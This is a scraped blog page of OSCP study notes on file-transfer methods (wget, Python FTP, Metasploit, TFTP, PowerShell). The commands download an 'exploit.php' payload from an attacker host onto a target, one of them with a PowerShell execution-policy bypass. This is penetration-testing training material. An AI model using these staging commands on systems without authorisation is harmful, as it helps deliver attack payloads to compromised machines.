OSCP Learning Notes - File Transfers(1)
File transfer type:
1. HTTP
Transfer files through the website.
2.wget
wget http://10.0.0.109/exploit.php
3.FTP
python FTP
(1)Install python FTP on the Kali Linux.
pip3 install pyftpdlib
(2)Move to the target folder, and start the FTP service.
python3 -m pyftpdlib -p
(3)Login the ftp service on Windows 10 anonymously.
(4) Get the file form FTP server.
(5)Exit FTP service.
We can also save the shellcode to txt file.
(1) Execute the following commands to make the ftp command file.
echo open 10.0.0.109 > ftp.txt echo anonymous>> ftp.txt echo pass>>ftp.txt echo binary>> ftp.txt echo get exploit.php >> ftp.txt echo bye >> ftp.txt
(2) Get the files from the FTP server.
ftp -s:ftp.txt
4.Metasploit
(1) Start the metasploit.
(2) Initiate the FTP service,.
use auxiliary/server/ftp show options exploit
(3) Stop the FTP service.
5.TFTP
(1)Start the TFTP service on Kali Linux.
atftpd --daemon --port /var/www/html
(2) Get the file from tftp server.
tftp -i 10.0.0.109 get exploit.php
6.Powershell
(1) Make the powershell file to get the file form Kali server.
echo $storage = $pwd > get.ps1 echo $webclient = New-Object System.Net.Webclient >> get.ps1 echo $url = "http://10.0.0.109/exploit.php" >> get.ps1 echo $file = "exploit.php" >> get.ps1 echo $webclient.DownloadFile($url,$file) >> get.ps1
(2)Execute the powershell code.
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1
OSCP Learning Notes - File Transfers(1)的更多相关文章
- OSCP Learning Notes - File Transfers(3)
Metasploit Attack Target Server: IE8 on WinXP 1.Start the Metasploit. setoolkit 2.Select 2)Website A ...
- OSCP Learning Notes - File Transfers(2)
Metasploit Target Server: Kioptrix Level 1 (1) Start the Metasploit on Kali Linux. (2) Set the modul ...
- OSCP Learning Notes - Overview
Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concep ...
- OSCP Learning Notes - Buffer Overflows(1)
Introduction to Buffer Overflows Anatomy of Memory Anatomy of the Stack Fuzzing Tools: Vulnserver - ...
- OSCP Learning Notes - Enumeration(3)
SMB Enumeration 1. Set the smb configurations. locate smb.conf vim /etc/samba/smb.conf Insert the gl ...
- OSCP Learning Notes - Kali Linux
Install Kali Linux : https://www.kali.org/ Common Commands: pwd man ls ls -la cd mkdir rmdir cp mv l ...
- OSCP Learning Notes - Exploit(8)
Tools: 3. hydra Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or secret se ...
- OSCP Learning Notes - Exploit(7)
Pre-Exploit Password Attacks Tools: 1. ncrack Ncrack 0.6 ( http://ncrack.org )Usage: ncrack [Options ...
- OSCP Learning Notes - Exploit(3)
Modifying Shellcode 1. Search “vulnserver exploit code” on the Internet. Find the following website ...
随机推荐
- 《Java并发编程的艺术》第5章 Java中的锁 ——学习笔记
参考https://www.cnblogs.com/lilinzhiyu/p/8125195.html 5.1 Lock接口 锁是用来控制多个线程访问共享资源的方式. 一般来说一个锁可以防止多个线程同 ...
- 深入理解JVM(③)ZGC收集器
前言 ZGC是一款在JDK11中新加入的具有实验性质的低延迟垃圾收集器,目前仅支持Linux/x86-64.ZGC收集器是一款基于Region内存布局的,(暂时)不设分代的,使用了读屏障.染色指针和内 ...
- 使用SpringCloud Stream结合rabbitMQ实现消息消费失败重发机制
前言:实际项目中经常遇到消息消费失败了,要进行消息的重发.比如支付消息消费失败后,要分不同时间段进行N次的消息重发提醒. 本文模拟场景 当金额少于100时,消息消费成功 当金额大于100,小于200时 ...
- 从Spring Initializr开始
出识springcloud我们这里需要建立两个项目 来感受下微服务 一.配置服务 1. Spring Initializr. 用idea自带的 Spring Initializr. 建立第一个项目 2 ...
- 3、尚硅谷_SSM高级整合_使用ajax操作实现增加员工的功能
20.尚硅谷_SSM高级整合_新增_创建员工新增的模态框.avi 1.接下来当我们点击增加按钮的时候会弹出一个员工信息的对话框 知识点1:当点击新增的时候会弹出一个bootstrap的一个模态对话框 ...
- MySql数据库GROUP BY使用过程中的那些坑
MySql数据库GROUP BY使用过程中的那些坑 GROUP BY 语句用于结合合计函数,根据一个或多个列对结果集进行分组. 特别注意: group by 有一个原则,就是 select 后面的所有 ...
- 暑假集训Day0
啊这 跟学长学的要写日记 希望到时候能写省选集训的总结 咳咳 今天上午做了一上午苦力好像让老苏夸了难以接受(年纪两百考到年级两千他居然没有干我) 上午搞卫生搞到了十点半………… 替女生拉包提东西了!! ...
- maven跳过测试打包
1.在执行run as时候加上参数: clean install compile -Dmaven.test.skip=true 2.在pom文件中添加如下: <plugins> < ...
- python+opencv切割细胞及细胞团(持续更新)
内容包括:游离细胞的切割,有效细胞的信息提取,找出非正常细胞,细胞团的切割,找出非正常细胞团 代码较多,请移步到我的github
- dart快速入门教程 (7.2)
7.4.抽离类为单独文件 新建一个文件,单独存放一个类,例如:Person类抽离到person.dart文件中 class Person { final String name; final num ...